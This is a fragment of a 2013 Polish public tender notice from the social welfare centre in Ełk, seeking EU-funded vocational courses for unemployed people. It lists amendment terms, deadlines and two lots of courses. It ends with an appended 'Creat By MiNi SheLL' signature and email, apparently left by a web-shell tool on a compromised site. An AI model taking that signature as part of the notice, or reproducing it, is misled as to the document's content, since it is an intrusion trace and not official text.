W umowie stosownie do postanowień pkt. 1 ppkt. a) i b) zmianie ulega przeliczenie kosztu szkolenia. 
W takim przypadku koszt szkolenia stanowi iloczyn kosztu szkolenia jednej osoby oraz rzeczywistej ilości osób, które rozpoczęły szkolenie.
2. w sytuacji, gdy liczba osób szkolonych (w trakcie odbywającego się szkolenia) ulegnie zmniejszeniu Wykonawca może ubiegać się o zwrot kosztów szkolenia osób, które przerwały szkolenie. W takim przypadku wysokość kosztów ustala się proporcjonalnie do okresu szkolenia, w którym uczestniczyły.
3. umowa może ulec zmianie w wyniku wystąpienia następujących okoliczności ze strony Wykonawcy:
	a) zmiana kadry realizującej kurs w wyniku nieprzewidywalnych zdarzeń losowych (np. choroba, śmierć, rozwiązanie stosunku pracy), których nie można było przewidzieć w dniu zawarcia umowy, po warunkiem, że nowo wskazany wykładowca będzie posiadał wykształcenie i doświadczenie w zakresie takim samym jak jego poprzednik
	b) zmiana miejsca wykonywania zamówienia (szkolenia) pod warunkiem, że nowe miejsce wykonania zamówienia zlokalizowane zostanie w miejscu równoważnym lub korzystniejszym dla osób bezrobotnych.

4. Zamawiający zastrzega sobie zmianę terminu wykonania usługi z uzasadnionych przyczyn tj.:
a) przedłużenie procedury przetargowej, 
b) wniesienie środków ochrony prawnej przez wykonawców
5. Zmiana umowy następuje na umotywowany wniosek Zamawiającego lub Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://elk-mops.bip-wm.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej 
w Ełku przy ul. Piłsudskiego 8, sekretariat I piętro, lub przesłać pocztą.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2013 godzina 09:00, miejsce: w Miejskim Ośrodku Pomocy Społecznej 
w Ełku przy ul. Piłsudskiego 8, sekretariat I piętro, lub przesłać pocztą.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Jutro idę do pracy! współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Priorytet VII POKL. Działanie 7.1. Podziałanie 7.1.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie kursów zawodowych, dla uczestników projektu systemowego Jutro idę do pracy ! współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1

W skład części pierwszej zamówienia zleca się wykonanie kursów z zakresu:

I. Przedstawiciel handlowy + prawo jazdy kat. B dla 34 osób. 
II. Prawo jazdy kat. C + wstępna kwalifikacja przyspieszona dla 3 osób.
III. Kurs na operatora koparko - ładowarki dla 1 osoby.
IV. Magazynier - sprzedawca z obsługą wózków jezdniowych z bezpieczną wymianą butli gazowej dla 10 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie kursów zawodowych, dla uczestników projektu systemowego Jutro idę do pracy ! współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2

W skład części drugiej zamówienia zleca się wykonanie kursów z zakresu:

I.   Opiekun osoby starszej z elementami masażu dla 13 osób.
II.  Ochrona mienia, dozór i eksploatacja urządzeń instalacji i sieci elektroenergetycznych do 1 kV w zakresie: obsługi, konserwacji, remontów i montażu. dla 3 osób.
III. Kucharz małej gastronomii z elementami cateringu + minimum sanitarne dla 6 osób.
IV. Projektowanie i pielęgnacja terenów zielonych z elementami bukieciarstwa dla 3 osób.
V. Kurs grafiki komputerowej z elementami obsługi programów biurowych dla 2 osób.
VI. Nowoczesny sprzedawca z obsługą komputera i kas fiskalnych dla 13 osób.
VII. Wizaż, makijaż, stylizacja i kreowanie wizerunku z elementami stylizacji paznokci dłoni 
i stóp - akryl, żel dla 5 osób.
Organizacja bezpłatnych praktyk zawodowych w części II zamówienia.
-	Organizacja bezpłatnych praktyk zawodowych dla minimum 30 osób biorących udział 
w projekcie.
-	Praktyka ma trwać przez okres 1 miesiąca (oprócz sobót i niedziel) w godzinach od 7.00 - 15.00 
-	Okres realizacji: po zakończeniu kursu zawodowego
-	Zamawiający żąda, aby Wykonawca wskazał w (zał. Nr 12) rodzaj wykonywanych praktyk (jakiego kursu dotyczą), terminów, miejsc odbycia oraz ilości osób uczestniczących 
w poszczególnych praktykach.
-	Organizator ma zapewnić: 
o	szkolenie BHP, 
o	badania z zakresu medycyny pracy, 
o	miejsce odbycia praktyki, 
o	zakup odzieży, jeżeli okaże się niezbędna do wykonywania zadań powierzonych podczas odbywania praktyki. 
Miejsce odbycia praktyki jest miasto Ełk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.32.20.00-3, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com